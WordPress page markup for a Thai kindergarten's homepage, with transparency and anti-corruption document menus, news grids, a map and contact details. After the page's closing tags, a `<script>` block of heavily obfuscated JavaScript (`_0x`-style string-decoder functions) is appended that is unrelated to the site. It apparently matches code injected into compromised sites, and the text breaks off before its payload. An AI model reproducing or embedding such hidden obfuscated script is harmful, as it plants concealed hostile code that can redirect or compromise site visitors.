gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1H4PRZlpAa4ZD6uq6Ew5Wx3nLXGcUNa09/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 